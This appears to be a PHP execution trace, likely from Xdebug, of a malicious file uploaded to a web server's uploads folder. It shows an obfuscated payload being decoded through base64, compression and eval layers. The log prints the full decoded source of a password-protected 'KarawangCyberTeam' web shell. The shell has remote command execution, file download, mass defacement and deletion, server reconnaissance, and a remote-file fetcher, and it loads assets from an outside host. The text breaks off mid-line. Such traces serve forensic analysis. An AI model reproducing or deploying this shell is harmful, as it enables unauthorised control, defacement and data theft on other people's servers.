1 3 0 0.000289 410736 {main} 1 /var/www/html/uploads/shellll.PHP 0 0
1 A /var/www/html/uploads/shellll.PHP 14 $JhonCoders = 'ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRCbGFja19Db2RlcnMlMjklMjklMjklMjklMjklM0I='
1 A /var/www/html/uploads/shellll.PHP 16 $Black_Coders = '==gJfOAk/4vdzOIArPyfGprNm6d57OeVc697erMc8JL7G2Rnppn/KP7kzv5w6iW3tlVDt3Jq6W1O0Y9RSFjGq3JTa/6EU7O15t03TGmMAzoi7efDc6dRSFvLNz6Sky2SzSsnaqL72UmwV2EcNQzN/ac8lUlaNsTIKJqsT8Lp/9a6pEO3hrwIMFQw97jIpWacI85EeWCJEtBfktqbHZZ7kvdAdZ7Nzw/0CoHScSgtF9My9tscN95fSS3+13nX8wYbk5NqzwwC0nIoA1U2cjwMbM7lYu9zrFzrbmVjcqNzr94Gx0rMqshkX3M0kaD1cDCPG4Zd+5PX74HdP+5XJNt6mhLAVNpf0Fja0ssAqxEmj0iWspNVNIGvQtpN6OxpOWgWkRtIkzh2bZLK5Ut4CmZ4XyPGfRjynICggyUCowHiOKY62rdTt2F+PYoAR5kgVguVFm6Dv4WCY7zhjj8dXOoq/Ih54p3MVljevn5IaTHYG3mLiqLnJGD+rDYQIQwt65Ji'
2 4 0 0.000364 410736 base64_decode 0 /var/www/html/uploads/shellll.PHP 17 1 'ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRCbGFja19Db2RlcnMlMjklMjklMjklMjklMjklM0I='
2 4 1 0.000386 410960
2 4 R 'eval%28%27%3F%26gt%3B%27.gzuncompress%28gzinflate%28base64_decode%28strrev%28%24Black_Coders%29%29%29%29%29%3B'
2 5 0 0.000406 410928 urldecode 0 /var/www/html/uploads/shellll.PHP 17 1 'eval%28%27%3F%26gt%3B%27.gzuncompress%28gzinflate%28base64_decode%28strrev%28%24Black_Coders%29%29%29%29%29%3B'
2 5 1 0.000425 411120
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Black_Coders)))));'
2 6 0 0.000443 410896 htmlspecialchars_decode 0 /var/www/html/uploads/shellll.PHP 17 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Black_Coders)))));'
2 6 1 0.000461 411056
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Black_Coders)))));'
2 7 0 0.000491 412416 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Black_Coders)))));' /var/www/html/uploads/shellll.PHP 17 0
3 8 0 0.000509 412416 strrev 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code 1 1 '==gJfOAk/4vdzOIArPyfGprNm6d57OeVc697erMc8JL7G2Rnppn/KP7kzv5w6iW3tlVDt3Jq6W1O0Y9RSFjGq3JTa/6EU7O15t03TGmMAzoi7efDc6dRSFvLNz6Sky2SzSsnaqL72UmwV2EcNQzN/ac8lUlaNsTIKJqsT8Lp/9a6pEO3hrwIMFQw97jIpWacI85EeWCJEtBfktqbHZZ7kvdAdZ7Nzw/0CoHScSgtF9My9tscN95fSS3+13nX8wYbk5NqzwwC0nIoA1U2cjwMbM7lYu9zrFzrbmVjcqNzr94Gx0rMqshkX3M0kaD1cDCPG4Zd+5PX74HdP+5XJNt6mhLAVNpf0Fja0ssAqxEmj0iWspNVNIGvQtpN6OxpOWgWkRtIkzh2bZLK5Ut4CmZ4XyPGfRjynICggyUCowHiOKY62rdTt2F+PYoAR5kgVguVFm6Dv4WCY7zhjj8dXOoq/Ih54p3MVljevn5IaTHYG3mLiqLnJGD+rDYQIQwt65Ji'
3 8 1 0.000546 428832
3 8 R 'AesoFNd4nO196XLbuNLob09V3gHD4xrK37EWb5nEsZ3Y8hI5jhdJXuLEpaJISmJEkRySsqycyX2M++P+ue92n+R2NwAuErXYceabr2pSFYsEGo0G0OhuNBrg1luv4734pfhfbKA5IQtd5pu6a5hvma45BaY5BjNcRw1Zy/XbJgHovmlY8NQxmdYPO67PNpfYfxVf/BKYYSO0embDtnpWmCstvXnxi+n7rt/wTc/1Q8tp88R3lmM1ADqn8mzbbavLTt+205mQ3CCAQF0eKdfTHhrmg6n3Q8t1qNIxELcfev2w0ey3WqYPVY8BGFbg2dowqoJRfmAGAeIMQs0Pc5hiaKHZMMyW1rd5+765jkkolN3A0orHWhdANQVhFx3N0dg203wfMPdM6LPcYuP8rFZfZouNo4M6AXkDA2CUruuErm2v/76ivGHFIvO0IBi4vvHiF6uVM3teOISytYNarXJ2+hl7w3LUu6Ul9p8Xv7zdefHLVifs2fC7sNUxNQMfFrZ6'
3 9 0 0.000582 428800 base64_decode 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code 1 1 'AesoFNd4nO196XLbuNLob09V3gHD4xrK37EWb5nEsZ3Y8hI5jhdJXuLEpaJISmJEkRySsqycyX2M++P+ue92n+R2NwAuErXYceabr2pSFYsEGo0G0OhuNBrg1luv4734pfhfbKA5IQtd5pu6a5hvma45BaY5BjNcRw1Zy/XbJgHovmlY8NQxmdYPO67PNpfYfxVf/BKYYSO0embDtnpWmCstvXnxi+n7rt/wTc/1Q8tp88R3lmM1ADqn8mzbbavLTt+205mQ3CCAQF0eKdfTHhrmg6n3Q8t1qNIxELcfev2w0ey3WqYPVY8BGFbg2dowqoJRfmAGAeIMQs0Pc5hiaKHZMMyW1rd5+765jkkolN3A0orHWhdANQVhFx3N0dg203wfMPdM6LPcYuP8rFZfZouNo4M6AXkDA2CUruuErm2v/76ivGHFIvO0IBi4vvHiF6uVM3teOISytYNarXJ2+hl7w3LUu6Ul9p8Xv7zdefHLVifs2fC7sNUxNQMfFrZ6'
3 9 1 0.000648 445216
3 9 R '\001�(\024�x��}�r۸��oOU�\001��\032�߱\026o�ı���\0229�\027I^�ĥ�HJbD�\034�����}����v��v7\000.\022��q曯jR\025�\004\032�\006��n4\032��[����_l�9!\v]曺k�o��9\005�9\0063\\G\rY��&\001�iX��1��\017;��6��\025_�\022�a#�zfözV�+-�y����M�C�i��w�c5\000:��l�m��N߶ә�� �@]\036)��\036\032惩�C�u��1\020�\037z����Z�\017U�\001\030V���0��Q~`\006\001�\fB�\017s�bh��0ַ̖y����I(��Ҋ�Z\027@5\005a\027\035���6�|\0370�L��b�V_f����:\001y\003\003`��넮m�����a�"� \030����\027��3{^8����Z�rv�\031{�rԻ�%��\027���y��V\'�'
3 10 0 0.000941 428800 gzinflate 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code 1 1 '\001�(\024�x��}�r۸��oOU�\001��\032�߱\026o�ı���\0229�\027I^�ĥ�HJbD�\034�����}����v��v7\000.\022��q曯jR\025�\004\032�\006��n4\032��[����_l�9!\v]曺k�o��9\005�9\0063\\G\rY��&\001�iX��1��\017;��6��\025_�\022�a#�zfözV�+-�y����M�C�i��w�c5\000:��l�m��N߶ә�� �@]\036)��\036\032惩�C�u��1\020�\037z����Z�\017U�\001\030V���0��Q~`\006\001�\fB�\017s�bh��0ַ̖y����I(��Ҋ�Z\027@5\005a\027\035���6�|\0370�L��b�V_f����:\001y\003\003`��넮m�����a�"� \030����\027��3{^8����Z�rv�\031{�rԻ�%��\027���y��V\'�'
3 10 1 0.001194 441120
3 10 R 'x��}�r۸��oOU�\001��\032�߱\026o�ı���\0229�\027I^�ĥ�HJbD�\034�����}����v��v7\000.\022��q曯jR\025�\004\032�\006��n4\032��[����_l�9!\v]曺k�o��9\005�9\0063\\G\rY��&\001�iX��1��\017;��6��\025_�\022�a#�zfözV�+-�y����M�C�i��w�c5\000:��l�m��N߶ә�� �@]\036)��\036\032惩�C�u��1\020�\037z����Z�\017U�\001\030V���0��Q~`\006\001�\fB�\017s�bh��0ַ̖y����I(��Ҋ�Z\027@5\005a\027\035���6�|\0370�L��b�V_f����:\001y\003\003`��넮m�����a�"� \030����\027��3{^8����Z�rv�\031{�rԻ�%��\027���y��V\'����15\003'
3 11 0 0.001428 424704 gzuncompress 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code 1 1 'x��}�r۸��oOU�\001��\032�߱\026o�ı���\0229�\027I^�ĥ�HJbD�\034�����}����v��v7\000.\022��q曯jR\025�\004\032�\006��n4\032��[����_l�9!\v]曺k�o��9\005�9\0063\\G\rY��&\001�iX��1��\017;��6��\025_�\022�a#�zfözV�+-�y����M�C�i��w�c5\000:��l�m��N߶ә�� �@]\036)��\036\032惩�C�u��1\020�\037z����Z�\017U�\001\030V���0��Q~`\006\001�\fB�\017s�bh��0ַ̖y����I(��Ҋ�Z\027@5\005a\027\035���6�|\0370�L��b�V_f����:\001y\003\003`��넮m�����a�"� \030����\027��3{^8����Z�rv�\031{�rԻ�%��\027���y��V\'����15\003'
3 11 1 0.001785 469792
3 11 R '<?php\r\n/* want to recode? can. and don\'t forget to credit the author :) */\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n@ini_set(\'error_log\',null);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n@ini_set(\'display_errors\', 0);\r\nsession_start();\r\ndate_default_timezone_set("Asia/Jakarta");\r\n$nana = array_merge($_POST, $_GET);\r\n$pwd = "kontoll471"; // password\r\nif(empty($_SESSION[\'login\'])) {\r\n?>\r\n<html>\r\n\t<head>\r\n\t\t'
3 12 0 0.002989 701160 eval 1 '?><?php\r\n/* want to recode? can. and don\'t forget to credit the author :) */\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n@ini_set(\'error_log\',null);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n@ini_set(\'display_errors\', 0);\r\nsession_start();\r\ndate_default_timezone_set("Asia/Jakarta");\r\n$nana = array_merge($_POST, $_GET);\r\n$pwd = "kontoll471"; // password\r\nif(empty($_SESSION[\'login\'])) {\r\n?>\r\n<html>\r\n\t<head>\r\n\t\t<meta charset="UTF-8">\r\n\t\t<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">\r\n\t\t<title><?=$_SERVER[\'HTTP_HOST\'];?> login filemanager V.0.1</title>\r\n\t\t<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">\r\n\t\t<script src="//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>\r\n\t</head>\r\n<body class="bg-secondary text-light">\r\n<div class="container-fluid">\r\n\t<div class="py-3" id="main">\r\n\t\t<div class="box shadow bg-dark p-4 rounded-3">\r\n\t\t\t<form method="post">\r\n\t\t\t\t<i class="bi bi-display"></i> Login Filemanager V.0.1</u>\r\n<?php\r\nif($nana[\'pwd\']) {\r\n\tif($nana[\'pwd\'] == $pwd) {\r\n\t\t$_SESSION[\'login\'] = "login";\r\nprint \'<strong>Login</strong> ok! \'.alt_ok().\'<a class="btn-close" href="\'.$_SERVER[\'PHP_SELF\'].\'"></a></div>\';\r\n\t\t} else { \r\nprint \'<strong>Login</strong> fail! \'.alt_fail().\'</div>\';\r\n\t}\r\n}\r\n?>\r\n\t\t\t\t<div class="input-group mb-3">\r\n\t\t\t\t<div class="input-group-text"><i class="bi bi-terminal"></i></div>\r\n\t\t\t\t\t<input class="form-control form-control-sm" type="password" name="pwd" placeholder="Password" required="required">\r\n\t\t\t\t</div>\r\n\t\t\t</form>\r\n\t\t<div class="text-secondary">© <?=date("Y");?> ./KarawangCyberTeam</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n</body>\r\n</html>\r\n<?php\r\nexit();\r\n}\r\n// logout\r\nif(isset($nana["left"])) {\r\n\tsession_start();\r\n\tsession_destroy();\r\n\tprint \'<script>window.location="\'.$_SERVER[\'PHP_SELF\'].\'";</script>\';\r\n}\r\n// download file\r\nif(isset($nana[\'opn\']) && ($nana[\'opn\'] != \'\') && ($nana[\'action\'] == \'download\')){\r\n\t@ob_clean();\r\n\t$file = $nana[\'opn\'];\r\n\theader(\'Content-Description: File Transfer\');\r\n\theader(\'Content-Type: application/octet-stream\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\r\n\theader(\'Expires: 0\');\r\n\theader(\'Cache-Control: must-revalidate\');\r\n\theader(\'Pragma: public\');\r\n\theader(\'Content-Length: \' . filesize($file));\r\n\treadfile($file);\r\n\texit;\r\n}\r\nfunction w($dir,$perm) {\r\n\tif(!is_writable($dir)) {\r\n\t\treturn "<rd>".$perm."</rd>";\r\n\t} else {\r\n\t\treturn "<cmd>".$perm."</cmd>";\r\n\t}\r\n}\r\nfunction s(){\r\n\tprint \'<style>table{display:none;}</style><br>\';\r\n}\r\nfunction alt_ok(){\r\n\tprint \'<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\';\r\n}\r\nfunction alt_fail(){\r\n\tprint \'<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\';\r\n}\r\nfunction op($d, $e) {\r\n\t$fp = fopen($d, "w");\r\n\t$ch = curl_init();\r\n\tcurl_setopt($ch, CURLOPT_URL, $e);\r\n\tcurl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\tcurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\tcurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\tcurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\r\n\tcurl_setopt($ch, CURLOPT_FILE, $fp);\r\n\treturn curl_exec($ch);\r\n\tcurl_close($ch);\r\n\tfclose($fp);\r\n\tob_flush();\r\n\tflush();\r\n}\r\nfunction sz($byt){\r\n\t$typ = array(\'B\', \'KB\', \'MB\', \'GB\', \'TB\');\r\n\tfor($i = 0; $byt >= 1024 && $i < (count($typ) -1 ); $byt /= 1024, $i++ );\r\n\treturn(round($byt,2)." ".$typ[$i]);\r\n}\r\nfunction ia() {\r\n\t$ia = \'\';\r\nif (getenv(\'HTTP_CLIENT_IP\'))\r\n\t$ia = getenv(\'HTTP_CLIENT_IP\');\r\nelse if(getenv(\'HTTP_X_FORWARDED_FOR\'))\r\n\t$ia = getenv(\'HTTP_X_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_X_FORWARDED\'))\r\n\t$ia = getenv(\'HTTP_X_FORWARDED\');\r\nelse if(getenv(\'HTTP_FORWARDED_FOR\'))\r\n\t$ia = getenv(\'HTTP_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_FORWARDED\'))\r\n\t$ia = getenv(\'HTTP_FORWARDED\');\r\nelse if(getenv(\'REMOTE_ADDR\'))\r\n\t$ia = getenv(\'REMOTE_ADDR\');\r\nelse\r\n\t$ia = \'S4dboy IP.\';\r\nreturn $ia;\r\n}\r\nfunction exe($cmd) {\r\nif(function_exists(\'system\')) {\r\n\t@ob_start();\r\n\t@system($cmd);\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\r\n\treturn $buff;\r\n} elseif(function_exists(\'exec\')) {\r\n\t@exec($cmd,$results);\r\n\t$buff = "";\r\nforeach($results as $result) {\r\n\t$buff .= $result;\r\n\t} return $buff;\r\n} elseif(function_exists(\'passthru\')) {\r\n\t@ob_start();\r\n\t@passthru($cmd);\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\r\n\treturn $buff;\r\n} elseif(function_exists(\'shell_exec\')) {\r\n\t$buff = @shell_exec($cmd);\r\n\treturn $buff;\r\n\t}\r\n}\r\nfunction p($file){\r\n$p = fileperms($file);\r\nif (($p & 0xC000) == 0xC000) {\r\n$i = \'s\';\r\n} elseif (($p & 0xA000) == 0xA000) {\r\n$i = \'l\';\r\n} elseif (($p & 0x8000) == 0x8000) {\r\n$i = \'-\';\r\n} elseif (($p & 0x6000) == 0x6000) {\r\n$i = \'b\';\r\n} elseif (($p & 0x4000) == 0x4000) {\r\n$i = \'d\';\r\n} elseif (($p & 0x2000) == 0x2000) {\r\n$i = \'c\';\r\n} elseif (($p & 0x1000) == 0x1000) {\r\n$i = \'p\';\r\n} else {\r\n$i = \'u\';\r\n\t}\r\n$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0040) ?\r\n(($p & 0x0800) ? \'s\' : \'x\' ) :\r\n(($p & 0x0800) ? \'S\' : \'-\'));\r\n$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0008) ?\r\n(($p & 0x0400) ? \'s\' : \'x\' ) :\r\n(($p & 0x0400) ? \'S\' : \'-\'));\r\n$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0001) ?\r\n(($p & 0x0200) ? \'t\' : \'x\' ) :\r\n(($p & 0x0200) ? \'T\' : \'-\'));\r\nreturn $i;\r\n}\r\nif(isset($nana[\'path\'])){\r\n\t$path = $nana[\'path\'];\r\n\tchdir($path);\r\n}else{\r\n\t$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\nif(isset($nana[\'dir\'])) {\r\n\t$dir = $nana[\'dir\'];\r\n\tchdir($dir);\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\nprint "\r\n<html>\r\n\t<head>\r\n\t\t<meta charset=\'UTF-8\'>\r\n\t\t<meta name=\'author\' content=\'KarawangCyberTeam\'>\r\n\t\t<meta name=\'viewport\' content=\'width=device-width, initial-scale=1, user-scalable=no\'>\r\n\t\t<title>".$_SERVER["HTTP_HOST"]." File Manager</title>\r\n\t\t<link rel=\'stylesheet\' href=\'//unknownsec.ftp.sh/main/@css_fm.css\'>\r\n\t\t<script src=\'//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js\'></script>\r\n\t\t<script src=\'//code.jquery.com/jquery-3.3.1.slim.min.js\'></script>\r\n\t</head>\r\n<script type=\'text/javascript\'>baseUrl = window.location.href.split(\'?\')[0]; window.history.pushState(\'name\', \'?\', baseUrl);</script>\r\n<script type=\'text/javascript\'>\r\nfunction c(x) {\r\n\twindow.location = x\r\n}\r\n</script>\r\n<body class=\'bg-secondary text-light\'>\r\n<div class=\'container-fluid\'>\r\n\t<div class=\'py-3\' id=\'main\'>\r\n\t\t<div class=\'box shadow bg-dark p-4 rounded-3\'>\r\n\t\t\t<a class=\'text-decoration-none text-light\' href=\'".$_SERVER[\'PHP_SELF\']."\'><h4>KarawangCyberTeam Filemanager</h4></a>";\r\n\t\t\tif(isset($nana[\'path\'])){\r\n\t\t\t\t$path = $nana[\'path\'];\r\n\t\t\t\tchdir($path);\r\n\t\t\t}else{\r\n\t\t\t\t$path = getcwd();\r\n\t\t\t}\r\n\t\t\t\t$path = str_replace(\'\\\\\',\'/\',$path);\r\n\t\t\t\t$paths = explode(\'/\',$path);\r\n\t\t\tforeach($paths as $id=>$pat){\r\n\t\t\tif($pat == \'\' && $id == 0){\r\n\t\t\t\t$a = true;\r\n\t\t\t\t\tprint "<i class=\'bi bi-hdd-rack\'></i>:<a class=\'text-decoration-none text-light\' onclick=\'c(\\"?path=/\\")\'>/</a>";\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\tif($pat == \'\') continue;\r\n\t\tprint "<a class=\'text-decoration-none\' onclick=\'c(\\"?path=";\r\n\t\tfor($i=0;$i<=$id;$i++){\r\n\t\tprint "$paths[$i]";\r\n\tif($i != $id) print "/";\r\n\t}\r\nprint "\\")\'>".$pat."</a>/";\r\n\t}\r\n\t$scand = scandir($path);\r\n\tprint " [ ".w($path, p($path))." ]";\r\nprint "\r\n<div class=\'center\'>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"".$_SERVER[\'PHP_SELF\']."\\")\'><i class=\'bi bi-house\'></i> Home</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=upload\\")\'><i class=\'bi bi-upload\'></i> Upload</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=deface\\")\'><i class=\'bi bi-exclamation-diamond\'></i> Mass depes</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=delete\\")\'><i class=\'bi bi-trash\'></i> Mass delete</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=cmd\\")\'><i class=\'bi bi-terminal\'></i> Terminal</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=jumping\\")\'><i class=\'bi bi-exclamation-triangle\'></i> Jumping</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=network\\")\'><i class=\'bi bi-hdd-network\'></i> Network</a>\r\n\t<br>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=zip\\")\'><i class=\'bi bi-file-earmark-zip\'></i> Zip & Unzip</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=info\\")\'><i class=\'bi bi-info-circle\'></i> Info server</a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&id=about\\")\'><i class=\'bi bi-info\'></i> About</a></h5>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?left\\")\'><i class=\'bi bi-box-arrow-in-left\'></i> Logout</a>\r\n</div>";\r\n// tools filemanager\r\nif(isset($nana[\'dir\'])) {\r\n\t$dir = $nana[\'dir\'];\r\n\tchdir($dir);\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\n$dir = str_replace("\\\\","/",$dir);\r\n$scdir = explode("/", $dir);\t\r\nfor($i = 0; $i <= $c_dir; $i++) {\r\n\t$scdir[$i];\r\n\tif($i != $c_dir) {\r\n}\r\n// mass deface #Karawang Cyber Team\r\nif($nana[\'id\'] == \'deface\'){\r\n\tfunction mass_kabeh($dir,$namafile,$isi_script) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\tprint "<pre>[<cmd>success</cmd>] $▚</pre>";\r\n\t\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t\t$▟ = mass_kabeh($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction mass_biasa($dir,$namafile,$isi_script) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\tprint "<pre>[<cmd>success</cmd>] $dirb/$namafile</pre>";\r\n\t\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif($nana[\'start\']) {\r\n\tif($nana[\'tipe\'] == \'massal\') {\r\n\t\tprint "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\tmass_kabeh($nana[\'d_dir\'], $nana[\'d_file\'], $nana[\'script\']);\r\n\t\tprint "</div>";\r\n\t} elseif($nana[\'tipe\'] == \'biasa\') {\r\n\t\tprint "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\tmass_biasa($nana[\'d_dir\'], $nana[\'d_file\'], $nana[\'script\']);\r\n\t\tprint "</div>";\r\n\t}\r\n} else {\r\ns();\r\nprint "\r\n<form action=\'?dir=$path&id=deface\' method=\'POST\'>\r\n\t<b>Tipe:</b><br>\r\n<div class=\'custom-control custom-switch\'>\r\n\t<input class=\'custom-control-input\' type=\'checkbox\' id=\'customSwitch\' name=\'tipe\' value=\'biasa\'>\r\n\t<label class=\'custom-control-label\' for=\'customSwitch\'>Biasa</label>\r\n</div>\r\n<div class=\'custom-control custom-switch\'>\r\n\t<input class=\'custom-control-input\' type=\'checkbox\' id=\'customSwitch1\' name=\'tipe\' value=\'massal\'>\r\n\t<label class=\'custom-control-label\' for=\'customSwitch1\'>Massal</label>\r\n</div>\r\n\t<b><i class=\'bi bi-folder\'></i> Directory:</b>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_dir\' value=\'$dir\' height=\'10\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> File name:</b>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_file\' placeholder=\'name file\' height=\'10\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> Your script:</b>\r\n\t<textarea class=\'form-control btn-sm\' rows=\'7\' name=\'script\' placeholder=\'your secript here\'></textarea><br />\r\n\t<input class=\'btn btn-outline-light btn-sm btn-block\' type=\'submit\' name=\'start\' value=\'submit\' >\r\n</form>";\r\n\t}\r\n}\r\n// info\r\nif($nana[\'id\'] == \'info\'){\r\n$sql = (function_exists(\'mysql_connect\')) ? "<cmd>ON</cmd>" : "<rd>OFF</rd>";\r\n$curl = (function_exists(\'curl_version\')) ? "<cmd>ON</cmd>" : "<rd>OFF</rd>";\r\n$wget = (exe(\'wget --help\')) ? "<cmd>ON</cmd>" : "<rd>OFF</rd>";\r\n$pl = (exe(\'perl --help\')) ? "<cmd>ON</cmd>" : "<rd>OFF</rd>";\r\n$py = (exe(\'python --help\')) ? "<cmd>ON</cmd>" : "<rd>OFF</rd>";\r\n$disfunc = @ini_get("disable_functions");\r\nif (empty($disfunc)) {\r\n\t$disfc = "<cmd>NONE</cmd>";\r\n} else {\r\n\t$disfc = "<rd>$disfunc</rd>";\r\n}\r\nif(!function_exists(\'posix_getegid\')) {\r\n\t$user = @get_current_user();\r\n\t$uid = @getmyuid();\r\n\t$gid = @getmygid();\r\n\t$group = "?";\r\n} else {\r\n\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t$gid = @posix_getgrgid(posix_getegid());\r\n\t$user = $uid[\'name\'];\r\n\t$uid = $uid[\'uid\'];\r\n\t$group = $gid[\'name\'];\r\n\t$gid = $gid[\'gid\'];\r\n}\r\n$sm = (@ini_get(strtolower("safe_mode")) == \'on\') ? "<rd>ON</rd>" : "<cmd>OFF</cmd>";\r\ns();\r\nprint "\r\n<div class=\'container\'>\r\n\t<div class=\'card text-dark\'>\r\n\t\t<div class=\'card-header\'>\r\nUname: <cmd>".php_uname()."</cmd><br>\r\nSoftware: <cmd>".$_SERVER["SERVER_SOFTWARE"]."</cmd><br>\r\nPHP version: <cmd>".PHP_VERSION."</cmd> <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$path&id=phpinfo\\")\'>[ PHPINFO ]</a> PHP os: <cmd>".PHP_OS."</cmd><br>\r\nServer Ip: <cmd>".gethostbyname($_SERVER[\'HTTP_HOST\'])."</cmd><br>\r\nYour Ip: <cmd>".ia()."</cmd><br>\r\nUser: <cmd>$user</cmd> ($uid) | Group: <cmd>$group</cmd> ($gid)<br>\r\nSafe Mode: $sm<br>\r\nMySQL: $sql | Perl: $pl | Python: $py | WGET: $wget | CURL: $curl<br>\r\nDisable Function:<br><pre>$disfc</pre>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br/>";\r\n}\r\n// phpinfo \r\nif($nana[\'id\'] == \'phpinfo\'){\r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\tprint "<pre class=\'php_info\'>".substr($buff,$awal,$akhir-$awal)."</pre>";\r\n\texit;\r\n}\r\nif($nana[\'id\'] == \'about\'){\r\ns();\r\nprint "\r\n<div class=\'container\'>\r\n\t<div class=\'card text-dark\'>\r\n\t\t<div class=\'card-header\'>\r\n\t\t\t<img class=\'img-thumbnail rounded mx-auto d-block\' alt=\'KarawangCyberTeam\' src=\'https://i.ibb.co/gygBGtw/20220422-004641.png\' width=\'150px\'>\r\n\t\t\t<b>- About Me -</b>\r\n\t\t\t<br/>Thank bro, for using my shell, if there is an error, please contact the email below.<br />Greetz : <u>{ Karawang Cyber Team } - And You</u><br/>My email: <a class=\'text-decoration-none\' 